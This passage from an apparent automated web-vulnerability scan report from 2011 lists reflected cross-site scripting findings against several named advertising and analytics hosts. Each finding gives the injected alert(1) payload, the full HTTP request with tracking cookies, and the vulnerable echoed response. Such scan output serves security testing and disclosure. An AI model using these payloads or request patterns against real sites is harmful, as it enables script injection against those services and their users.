!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:28 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:28 GMT
Pragma: no-cache
Content-Length: 4644
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?8f2c2"-alert(1)-"6ceae886f18=1&Z=468x60&s=1384085&_salt=140315222";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...
3.26. http://admatch-syndication.mochila.com/viewer/channel/badgex [buyerId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admatch-syndication.mochila.com
Path:   /viewer/channel/badgex

Issue detail

The value of the buyerId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a45a3</script><script>alert(1)</script>90304e5e524 was submitted in the buyerId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /viewer/channel/badgex?&asHtml=true&buyerId=OrlandoSentinela45a3</script><script>alert(1)</script>90304e5e524&destination=1596&channelId=13429&tid=10630&destination=&articleTemplateId=&badgeTemplateId=&widgetClass=&assetExcludeId=null&randomize=false&buid=1&rd=www.orlandosentinel.com&mcmp=all_ibd_tout_widget HTTP/1.1
Host: admatch-syndication.mochila.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:48 GMT
Server: VoxCAST
Last-Modified: Mon, 09 May 2011 14:02:48 GMT
Cache-Control: max-age=1200
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: Accept-Encoding
X-Cache: MISS from VoxCAST
Set-Cookie: JSESSIONID=1529D62A75546E533E45404DDEDC6525; Path=/
Content-Length: 9924


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<style type="text/css" media="screen">
body{

...[SNIP]...
<img id="mochilaTrack" src="http://admatch-syndication.mochila.com/images/ad.gif?mtyp=tout&buyerId=OrlandoSentinela45a3</script><script>alert(1)</script>90304e5e524&channelId=13429&mcmp=IBDTout&mche=', Math.random(), '" />
...[SNIP]...
3.27. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2252b'-alert(1)-'d4dfa0675de was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=1932252b'-alert(1)-'d4dfa0675de&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:46 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=1932252b'-alert(1)-'d4dfa0675de&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');
3.28. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b40'-alert(1)-'bf51ba85aa was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchc3b40'-alert(1)-'bf51ba85aa HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:51 GMT
Content-Length: 182

document.write('<img src="http://tag.admeld.com/matchc3b40'-alert(1)-'bf51ba85aa?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');
3.29. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 20009<script>alert(1)</script>eac34010d7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269720009<script>alert(1)</script>eac34010d7b?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 09 May 2011 14:00:52 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269720009<script>alert(1)</script>eac34010d7b
3.30. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload acdc2<script>alert(1)</script>2478b25a1c1 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionacdc2<script>alert(1)</script>2478b25a1c1&n=ar_int_p97174789&1304949596809 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304949586%2E006%2Cwait%2D%3E10000%2C; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:58 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionacdc2<script>alert(1)</script>2478b25a1c1("");
3.31. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload df383<script>alert(1)</script>19276a1a2c0 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7df383<script>alert(1)</script>19276a1a2c0&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:46 GMT
Date: Mon, 09 May 2011 14:00:46 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7df383<script>alert(1)</script>19276a1a2c0", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


3.32. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload a74ed<script>alert(1)</script>5f0e5f320d7 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=a74ed<script>alert(1)</script>5f0e5f320d7&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"a74ed<script>alert(1)</script>5f0e5f320d7", c16:"", r:""});


3.33. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload ee3b1<script>alert(1)</script>a730d899c17 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888ee3b1<script>alert(1)</script>a730d899c17&c3=2&c4=&c5=&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
